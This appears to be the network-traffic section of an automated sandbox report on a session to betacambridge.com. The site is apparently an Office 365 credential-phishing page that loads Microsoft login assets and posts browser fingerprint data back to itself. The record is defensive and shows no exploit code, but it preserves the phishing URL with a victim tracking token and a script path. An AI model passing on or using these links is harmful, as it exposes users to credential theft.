                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 18, 2024 21:15:44.445940018 CET1.1.1.1192.168.2.40xa610No error (0)betacambridge.com192.232.223.48A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:46.645879984 CET1.1.1.1192.168.2.40xe8cbNo error (0)www.google.com65IN (0x0001)false
                                            Nov 18, 2024 21:15:46.645939112 CET1.1.1.1192.168.2.40x10f2No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.183758974 CET1.1.1.1192.168.2.40x2adfNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.187685013 CET1.1.1.1192.168.2.40x7d4eNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.187685013 CET1.1.1.1192.168.2.40x7d4eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.187685013 CET1.1.1.1192.168.2.40x7d4eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.187685013 CET1.1.1.1192.168.2.40x7d4eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.187685013 CET1.1.1.1192.168.2.40x7d4eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:47.892823935 CET1.1.1.1192.168.2.40x2259No error (0)betacambridge.com192.232.223.48A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585185051 CET1.1.1.1192.168.2.40x659eNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585185051 CET1.1.1.1192.168.2.40x659eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585185051 CET1.1.1.1192.168.2.40x659eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585185051 CET1.1.1.1192.168.2.40x659eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585185051 CET1.1.1.1192.168.2.40x659eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585469007 CET1.1.1.1192.168.2.40x2098No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585469007 CET1.1.1.1192.168.2.40x2098No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.585722923 CET1.1.1.1192.168.2.40x7474No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.600661039 CET1.1.1.1192.168.2.40x6e1cNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.623773098 CET1.1.1.1192.168.2.40x2e56No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.623773098 CET1.1.1.1192.168.2.40x2e56No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.627831936 CET1.1.1.1192.168.2.40xf81dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.627831936 CET1.1.1.1192.168.2.40xf81dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.631015062 CET1.1.1.1192.168.2.40x23ccNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.631015062 CET1.1.1.1192.168.2.40x23ccNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.631015062 CET1.1.1.1192.168.2.40x23ccNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.632045031 CET1.1.1.1192.168.2.40xb823No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:48.632045031 CET1.1.1.1192.168.2.40xb823No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:49.956665039 CET1.1.1.1192.168.2.40xb920No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:49.956665039 CET1.1.1.1192.168.2.40xb920No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:49.964271069 CET1.1.1.1192.168.2.40xba26No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:49.964271069 CET1.1.1.1192.168.2.40xba26No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.213582039 CET1.1.1.1192.168.2.40x3cbeNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.213582039 CET1.1.1.1192.168.2.40x3cbeNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.213582039 CET1.1.1.1192.168.2.40x3cbeNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.214251041 CET1.1.1.1192.168.2.40xfa8bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.214251041 CET1.1.1.1192.168.2.40xfa8bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.322618961 CET1.1.1.1192.168.2.40xc792No error (0)www.betacambridge.combetacambridge.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.322618961 CET1.1.1.1192.168.2.40xc792No error (0)betacambridge.com192.232.223.48A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:50.457889080 CET1.1.1.1192.168.2.40xa082No error (0)www.betacambridge.combetacambridge.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:51.807451010 CET1.1.1.1192.168.2.40x2bafNo error (0)www.betacambridge.combetacambridge.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 21:15:51.807451010 CET1.1.1.1192.168.2.40x2bafNo error (0)betacambridge.com192.232.223.48A (IP address)IN (0x0001)false
                                            Nov 18, 2024 21:15:51.810303926 CET1.1.1.1192.168.2.40xce2cNo error (0)www.betacambridge.combetacambridge.comCNAME (Canonical name)IN (0x0001)false
                                            • betacambridge.com
                                            • https:
                                              • cdn.socket.io
                                              • aadcdn.msauth.net
                                              • logincdn.msauth.net
                                              • aadcdn.msftauth.net
                                              • www.w3schools.com
                                              • www.betacambridge.com
                                            • fs.microsoft.com
                                            • slscr.update.microsoft.com
                                            • otelrules.azureedge.net
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449736192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:45 UTC741OUTGET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N HTTP/1.1
                                            Host: betacambridge.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:45 UTC208INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:45 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-11-18 20:15:45 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                            Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449735192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:45 UTC981OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N HTTP/1.1
                                            Host: betacambridge.com
                                            Connection: keep-alive
                                            Content-Length: 139036
                                            Cache-Control: max-age=0
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            Origin: https://betacambridge.com
                                            Content-Type: application/x-www-form-urlencoded
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-Dest: document
                                            Referer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                            Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74
                                            Data Ascii: nt%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefault
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45
                                            Data Ascii: %22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverE
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32
                                            Data Ascii: nt%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%2
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32
                                            Data Ascii: AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%2
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74
                                            Data Ascii: sOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnat
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d
                                            Data Ascii: 22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElem
                                            2024-11-18 20:15:45 UTC16384OUTData Raw: 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61
                                            Data Ascii: tyautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistra
                                            2024-11-18 20:15:45 UTC7964OUTData Raw: 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b
                                            Data Ascii: 22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+
                                            2024-11-18 20:15:47 UTC208INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:45 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-11-18 20:15:47 UTC378INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 53 54 56 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 55 58 64 4e 56 45 46 35 54 31 52 4a 64 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                            Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqSTVNVEF5TURJMFZUUXdNVEF5T1RJdw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449739192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:47 UTC610OUTGET /n/jsnom.js HTTP/1.1
                                            Host: betacambridge.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:47 UTC263INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:47 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Thu, 14 Nov 2024 16:58:58 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 100217
                                            Vary: Accept-Encoding
